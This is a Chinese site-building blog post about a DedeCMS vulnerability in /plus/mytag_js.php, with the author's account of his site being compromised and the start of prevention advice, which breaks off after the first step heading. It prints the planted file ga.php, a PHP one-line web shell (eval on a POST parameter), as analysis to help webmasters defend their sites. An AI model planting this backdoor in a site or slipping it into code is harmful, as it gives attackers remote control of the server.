最新活动:电脑PC端+手机端+微网站+自适应网页多模板选择-建站388元起价!!!
要源码
当前位置:主页 > 网站建设 > 谈织梦DedeCMS近期的一些隐患及如何预防风险,织梦

谈织梦DedeCMS近期的一些隐患及如何预防风险,织梦

时间:2023-07-22 13:07:22 阅读: 文章分类: 网站建设 作者: dede开发者

导读:织梦文章织梦文章DedeCMS 一直是很火的建站cms,主要得益于两大 站长 网 的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dede织梦模板。

织梦模板

 DedeCMS一直是很火的建站cms,主织梦首页模板要得益于两大站长网 的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单, 那么便是黑链,知道后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患措施。

  因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要 发生在/plus/mytag_js.php中,原理便是准备一个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入一句话的代码,只要成功写 入,那么以后便可以利用这些代码来获得后台管理员权限。

  结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于/plus/文件夹下,目前已知的几个文件包括ga.php、 log.php、b.php、b1.php等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代码的作用确实不小的。

  下面这是ga.php文件中的部分代码:

1 2 3 4 5 6 织梦模板 7 8 9 <title>login</title>no<?php eval($_POST[1]) ?> <title>login</title>no<?php eval($_POST[1]) ?> <title>login</title>no<?php eval($_POST[1]) ?>

  实际的代码比上面截取的要长,不过都是这段代码的重复,至于log.php的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那么会知道是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破解密码的功能。

  既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们有所帮助。

  一、升级版本打好补丁设置目录权限

关键词标签: CMS 隐患 如何预防

声明: 本文由我的SEOUC技术文章主页发布于:2023-07-22 ,文章谈织梦DedeCMS近期的一些隐患及如何预防风险,织梦主要讲述隐患,如何预防,CMS网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: https://www.seouc.com/article/web_34398.html

我的IDC 网站建设技术SEOUC.COM
专注网站建设,SEO优化,小程序设计制作搭建开发定制网站等,数千家网站定制开发案例,网站推广技术服务。
  • 5000+合作客服
  • 8年从业经验
  • 150+覆盖行业
  • 最新热门源码技术文章